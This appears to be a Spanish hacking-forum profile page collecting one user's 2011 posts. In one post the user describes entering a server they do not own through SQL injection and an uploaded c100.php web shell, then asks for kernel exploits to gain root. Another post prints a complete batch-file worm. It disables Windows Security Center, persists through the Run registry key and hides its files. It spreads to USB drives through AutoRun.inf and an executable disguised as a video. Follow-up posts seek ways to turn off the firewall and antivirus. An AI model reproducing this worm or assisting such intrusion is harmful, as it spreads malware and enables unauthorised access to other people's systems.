Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - morty2

#1
el mmap lo usa uno de los exploits que probe, pero ninguno de los que e encontrado da resultados!!
#2
gracias amigo!!
e leido un poco mas sobre exploits y e encontrado alguno, lo malo es que no tengo acceso a gcc en el servidor para compilarlos!!

pense en montar una virtual kon el mismo kernel, compilar ahi el exploit y subirselo al servidor!!

otros que encontre compilados me dice que no tengo acceso a mmap.

ideas?
#3
Bugs y Exploits / ayuda escalada de privilegios!!!
22 Septiembre 2011, 06:48 AM
hola amigos de foro elhacker!!!!

la cosa es que tengo una shell c100.php, pero tengo permisos de usuario y necesito escalar privilegios para conseguir root.  La cosa es que dentro del servidor, hay unos archivos que son mios y que el webmaster no me quiere devolver!!!
asique me decidí a mirar a ver si los podria recuperar por mi cuenta.
mediante una injeccion sql, saque los datos de user y pass del webmaster y con el upload le subi la shell, el problema es que al retrocedes en el servidor, no me deja acceder a gran parte, pues necesitaria ser root.

datos del servidor:

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux-------------------------------------- 2.6.18-028stab092.1 #1 SMP Wed Jul 20 19:47:12 MSD
2011 x86_64

uid=48(apache) gid=48(apache) groups=48(apache),505(psaserv) 

Safe-mode: OFF (not secure)


he leido algo de un exploit para escalada de privilegios en kernel en la version 2.6
pero en los exploits soy nulo totalmente, no se compilarlos y no se programacion!!!!!

si alguien sabe como ayudarme se lo agradeceria muchisimo.
espero vuestras respuestas pronto!!

un saludo y gracias de antemano!!
#4
gracias a todos por vuestros comentarios y ayuda!!!
No tengo intencion alguna de pasarme al lado oscuro!!!jejeje...
Solo me interesa aprender y saber si puedo o no conseguir algo, sin necesidad de hacer el mal. Ando intentando aprender un poco de c++ pero estoy muy pero que muy verde aún. De todas maneras agradezco a todo el mundo su apoyo.

Cita de: CL1O en  6 Enero 2011, 01:59 AM
A ver,,, mmm como te explico, vos dijistes estoy empezando, y como estas empezando, que no se te haga maña hacer estas cosas sha que te vas a comer el cartel que sho no puse para ofender..
Veo que invertiste tiempo y trabajo en esto, y lo felicito esta muy bien, pero hay gente que se mete en eso y no sale mas, después lo único que hacen es hacer cosas así que quizá no se vean bien.
Que se sho mira usa eso que sabes o que quieres saber en algo constructivo, no es que nunca haya hecho algo de esto pero bueno..

SAludos y disculpa...


acepto y pido tambien disculpas si te ofendi!!

todo lo que hago es afan de aprender, el saber no ocupa lugar pero se invierte mucho tiempo.

Salu2
morty2
#5
Cita de: Arcano. en  5 Enero 2011, 19:31 PM
Buenas,

Si piensas continuar el código y tu intención es parar el antivirus, sí. Así no avisará el sistema, pero... Tal cual está, "a tu propagador" le da un poquito igual "El centro de seguridad". Y "El centro de seguridad" tampoco te va a controlar si se copia un fichero.

Supongo que tu idea es: (1) Acceder al sistema. (2) Propagarte por USB.

Para ello: Deberías parar el Firewall para acceder, parar el centro de seguridad, el antivirus, y empezar a escribir... Y... Lo más importante, ¿cómo accederías al sistema?.

Nada, el código, como está... Es un buen principio. Pero no le veo utilidad a parar el Centro de Seguridad.

De todas formas, existe gente por el foro que sabe mucho más de estos temas. A ver si te cuentan algo.

Saludos!
Mi idea es seguir con el code para desctivar el Av. Pero tengo que averiguar como hacerlo
#6
Cita de: Arcano. en  5 Enero 2011, 19:20 PM
Buenas morty2,

Sólo una pregunta, ¿para qué paras el centro de seguridad?.

Con eso, evitarás el mensajito de "No tiene antivirus, no está activo el Firewall, no están activas las actualizaciones automáticas", pero... ¿De qué te servirá?.

¿No será mejor que detengas el Firewall de Windows XP? Ya que de lo contrario, no podrás acceder al equipo.

Para empezar... Es un buen principio. Espero que tu curiosidad no te empuje "al lado oscuro"...  :¬¬

Saludos.


tu lo has dicho!!!para evitar cartelitos, para hacerlo mas oculto a la vista, pensé que seria bueno n?
como detengo el firewall??

salu2
morty2
#7
Cita de: 4ng3r en  5 Enero 2011, 19:02 PM
Yo creo q este espacio no es para ofender y atacarnos es para compartir ideas y expresarlas libremente, la propuesta de morty2 es interesante y me gustaría probarla haber que tal !!!  :rolleyes:

gracias 4ng3r!!
#8
Cita de: CL1O en  5 Enero 2011, 18:35 PM
Interesante..

Para que funciona, el LAMER.exe?  :silbar:

SAludos

no entiendo porque me llamas lamer, he dicho que estoy empezando y esto no es mas que un batch para propagar por usb.
¿esque tu naciste aprendido?....pues si no es asi, no la tires como si nada que los demas tambien sabemos tirarla.................."Renault CL1O"
Salu2
#9
hola amigos....
a ver que os parece!!



@echo off
#djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô
net stop "Centro de seguridad"
reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f
reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe"
ping -n 8 localhost > nul
attrib -s -r -h video.wmv.exe
copy /y "video.wmv.exe" "%windir%\video.wmv.exe
if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe
attrib -s -r -h junto.exe
copy /y "junto.exe" "%windir%\junto.exe
attrib -s -r -h prop.exe
copy /y "prop.exe" "%windir%\prop.exe
attrib +s +r +h video.wmv.exe
attrib +s +r +h prop.exe
attrib +s +r +h junto.exe
:bucle
call :copiausb
:copiausb
if exist E: call :creausb E
if exist F: call :creausb F
if exist G: call :creausb G
if exist H: call :creausb H
if exist I: call :creausb I
if exist J: call :creausb J
if exist K: call :creausb K
ping -n 8 localhost > nul
goto bucle
goto :eof
:creausb
copy /y "%windir%\junto.exe" "%1:\junto.exe"
attrib +s +r +h %1:\junto.exe
echo [Autorun] > %windir%\AutoRun.inf
echo open="junto.exe" >> %windir%\AutoRun.inf
echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf
echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf
echo shellexecute="junto.exe" >> %windir%\AutoRun.inf
echo UseAutoPlay=1 >> %windir%\AutoRun.inf
echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf
echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf
echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf
echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf
copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf"
attrib +h +s +r "%1:\AutoRun.inf"
goto :eof




el video.wmv.exe es el server con eliminación en inicio

junto.exe es el server y el propagador(prop.exe) conpactados en un .exe

no lo he provado en vista ni en win  7 pero en xp me funciona.


no seais malos con las criticas que estoy empezando!! :laugh: :laugh: :laugh:
saludos!!!
morty2
#10
Esta ocultado con el comando attrib de msdos, por eso no se veía ni aun poniendo que se muestren los archivos ocultos. Eso lo e solucionado, incluso había creado claves de registro el cabr..., jeje..